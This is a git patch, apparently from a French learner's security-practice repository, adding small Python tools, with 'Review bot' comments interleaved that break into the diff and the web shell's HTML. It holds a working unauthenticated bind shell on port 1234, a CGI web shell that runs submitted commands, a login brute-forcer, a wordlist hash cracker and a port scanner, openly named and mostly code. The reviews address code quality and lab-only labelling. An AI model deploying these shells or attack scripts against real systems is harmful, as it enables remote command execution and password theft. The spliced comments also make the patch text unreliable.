From a1203ccb343703ba5ae522254f75b6384a1831a7 Mon Sep 17 00:00:00 2001 From: jerome Date: Mon, 18 Dec 2023 00:02:09 +0100 Subject: =?UTF-8?q?dep=C3=B4t=20initial?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- bindshell.py | 16 ++++++++++++++++ bruteforce.py | 27 +++++++++++++++++++++++++++ chat_client.py | 15 +++++++++++++++ chat_server.py | 18 ++++++++++++++++++ connect.py | 14 ++++++++++++++ crack_hash.py | 20 ++++++++++++++++++++ html/cgi-bin/webshell.cgi | 35 +++++++++++++++++++++++++++++++++++ html/index.html | 12 ++++++++++++ rot13.py | 4 ++++ scan.py | 17 +++++++++++++++++ 10 files changed, 178 insertions(+) create mode 100644 bindshell.py create mode 100644 bruteforce.py create mode 100644 chat_client.py create mode 100644 chat_server.py create mode 100644 connect.py create mode 100644 crack_hash.py create mode 100755 html/cgi-bin/webshell.cgi create mode 100644 html/index.html create mode 100644 rot13.py create mode 100644 scan.py
diff --git a/bindshell.py b/bindshell.py
new file mode 100644
index 0000000..faa014d
--- /dev/null
+++ b/bindshell.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+import socket,os
+
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(('', 1234))
+    s.listen()
+    conn,addr = s.accept()
+    while 1:
+        data = conn.recv(1024)
+        reponse=os.popen(data.decode()).read()
+        conn.sendall(str(reponse).encode())
+except KeyboardInterrupt:
+    s.close()
+finally:
+    print("bye")
diff --git a/bruteforce.py b/bruteforce.py
new file mode 100644
index 0000000..45d950b
--- /dev/null
+++ b/bruteforce.py
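Review bot: The header of bindshell.py should say that it binds port 1234 on every interface (`s.bind(('', 1234))`) and hands whatever the peer sends to `os.popen` with no authentication, so it is only safe on an isolated lab host; a one-line `# lab only: listens on all interfaces and executes unauthenticated input` above the `try:` would do. The same header note belongs in html/cgi-bin/webshell.cgi, which runs the submitted `command` the same way and whose own comment only explains how to start `http.server --cgi`. Binding to `'127.0.0.1'` rather than `''` keeps the lab copy off the network unless it is deliberately exposed.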
@@ -0,0 +1,27 @@
+import sys
+import requests
+
+def bruteforce(url,username,password):
+    reponse=requests.post(url=url,data={
+        "username":username,
+        "password":password
+    })
+    #print(reponse.text)
+    if "Mauvais mot de passe" in reponse.text:
+        print("mauvais pwd")
+        return False
+    else:
+        print(f"Trouvé password \"{password}\"")
+        return True
+
+if __name__ == "__main__":
+    url = sys.argv[1]
+    dico = sys.argv[2]
+    with open(dico, 'r') as wordlist:
+        for password in wordlist.readlines():
+            password=password.strip()
+            if bruteforce(url,"jerome",password)==True:
+                sys.exit()
+
+#bruteforce("http://localhost/page.php","jerome","secret")
+
diff --git a/chat_client.py b/chat_client.py
new file mode 100644
index 0000000..0d1d9e8
--- /dev/null
+++ b/chat_client.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+import socket
+
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect(("localhost", 1234)) # adresse ip + port du serveur (tuple))
+    while 1:
+        message= input()
+        s.sendall(message.encode())
+        data=s.recv(1024)
+        print(data.decode())
+except KeyboardInterrupt:
+    s.close()
+finally:
+    print("bye")
diff --git a/chat_server.py b/chat_server.py
new file mode 100644
index 0000000..d857e99
--- /dev/null
+++ b/chat_server.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+import socket
+
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(('', 1234)) # toutes les interfaces réseau sur le port 1234
+    s.listen()
+    conn,addr = s.accept()
+    while 1:
+        data=conn.recv(1024)
+        print(data.decode())
+        reponse=input()
+        conn.sendall(reponse.encode())
+except KeyboardInterrupt:
+    s.close()
+finally:
+    print("bye")
+
diff --git a/connect.py b/connect.py
new file mode 100644
index 0000000..858d82f
--- /dev/null
+++ b/connect.py
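Review bot: The loop in chat_client.py never notices a closed peer: `s.recv(1024)` returns `b''` once the server has gone, so `print(data.decode())` keeps printing empty lines, and `s.close()` runs only on Ctrl-C while the `finally` merely prints. chat_server.py has the same shape around `conn.recv(1024)`. Replace the socket creation in the `try` with `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` so the socket is always closed, and stop on an empty read with `if not data: break` right after the `recv`.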
@@ -0,0 +1,14 @@
+import sys
+host=sys.argv[1]
+port=int(sys.argv[2])
+
+import socket
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+addr_server=(host,port)
+tentative=s.connect_ex(addr_server) #connect_ex renvoie 0 en cas de succès...
+if tentative==0:
+    print("port 80 ouvert")
+else:
+    print("Echec de connexion")
+s.close()
+
diff --git a/crack_hash.py b/crack_hash.py
new file mode 100644
index 0000000..a8ade90
--- /dev/null
+++ b/crack_hash.py
@@ -0,0 +1,20 @@
+import sys
+import hashlib
+
+def crack_hash(hash,wordlist,hashsum) :
+    """
+    Args:
+        hash : le hash à craquer
+        wordlist : la wordlist à utiliser
+        hashsum : md5 ou sha256 ou sha512...
+    """
+    with open(wordlist,"r") as fichier:
+        lignes = fichier.readlines()
+        for ligne in lignes:
+            #if hashlib.md5(ligne.strip().encode()).hexdigest() == hash:
+            if getattr(hashlib, hashsum)(ligne.strip().encode()).hexdigest() == hash :
+                print(f"trouvé : {ligne}")
+                exit()
+
+if __name__ == "__main__":
+    crack_hash(sys.argv[1],sys.argv[2],sys.argv[3])
diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi
new file mode 100755
index 0000000..6598d37
--- /dev/null
+++ b/html/cgi-bin/webshell.cgi
@@ -0,0 +1,35 @@
+#!/usr/bin/env python3
+
+# après avoir lancé le serveur : python3 -m http.server --cgi
+# placer le script (rendu exécutable) dans /cgi-bin...
+
+import cgi
+import os
+
+form = cgi.FieldStorage()
+cmd = form.getvalue('command')
+user = os.getlogin()
+host = os.environ.get('SERVER_NAME')
+pwd = os.environ.get('PWD')
+
+print("Content-Type: text/html; charset=UTF-8\n\n")
+print ("""
+ + +Web shell + + +
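Review bot: The success message in connect.py hard-codes port 80 (`print("port 80 ouvert")`) even though the port comes from `sys.argv[2]`, so the output is wrong for any other port; use `print(f"port {port} ouvert")`. The `import socket` sits below the argument parsing; placing it next to `import sys` matches the other files in this commit. A missing argument currently dies with an IndexError, so a short usage message when `len(sys.argv) < 3` would help, though that is a nicety.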
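Review bot: `getattr(hashlib, hashsum)` in crack_hash.py resolves any attribute name passed on the command line, so a typo surfaces as an AttributeError from inside the loop and a non-constructor name such as `new` fails with an unrelated TypeError; `hashlib.new(hashsum, ligne.strip().encode()).hexdigest()` rejects unknown algorithms with a ValueError and the name can be checked against `hashlib.algorithms_available` before the file is opened. The parameter `hash` shadows the builtin, and `exit()` inside the function prevents any caller from handling a match — returning the matching line (and `None` when the list is exhausted) and letting the `__main__` block decide is the usual shape. Iterating `for ligne in fichier:` avoids `readlines()` loading the whole wordlist into memory.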

Web shell

+

Entrez votre commande :

+
+ + +
""") +if cmd : + print("
")
+    print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}")
+    print("
")
+print("""
+
+
+""")
diff --git a/html/index.html b/html/index.html
new file mode 100644
index 0000000..ac28908
--- /dev/null
+++ b/html/index.html
@@ -0,0 +1,12 @@
+
+
+
+redirection
+
+
+
+
+
+
+
+
diff --git a/rot13.py b/rot13.py
new file mode 100644
index 0000000..f2d97b5
--- /dev/null
+++ b/rot13.py
@@ -0,0 +1,4 @@
+#!/usr/bin/env python3
+import codecs
+message = input()
+print(codecs.encode(message,'rot_13'))
diff --git a/scan.py b/scan.py
new file mode 100644
index 0000000..8b878ef
--- /dev/null
+++ b/scan.py
@@ -0,0 +1,17 @@
+import socket
+
+host="127.0.0.1"
+for port in range(0,65535):
+    try:
+        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+        s.settimeout(0.5)
+        s.connect((host,port)) # un tuple en argument : (( ))
+        try:
+            banner = s.recv(1024)
+            print("Le port ",port," est ouvert", banner.decode("utf-8").strip())
+        except:
+            print("Le port ",port," est ouvert")
+    except:
+        pass
+
+s.close()
-- cgit v1.2.3
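Review bot: The two bare `except:` clauses in scan.py also catch `KeyboardInterrupt` and `SystemExit`, so Ctrl-C cannot stop the 65535-iteration loop, and the inner one hides every error from `recv`/`decode` behind the "est ouvert" message; catch `OSError` around the connect (`except OSError: continue`) and `(TimeoutError, UnicodeDecodeError)` around the banner read. Each iteration creates a new socket but only the last one is closed by the `s.close()` after the loop; creating it with `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` inside the loop closes each one as it goes.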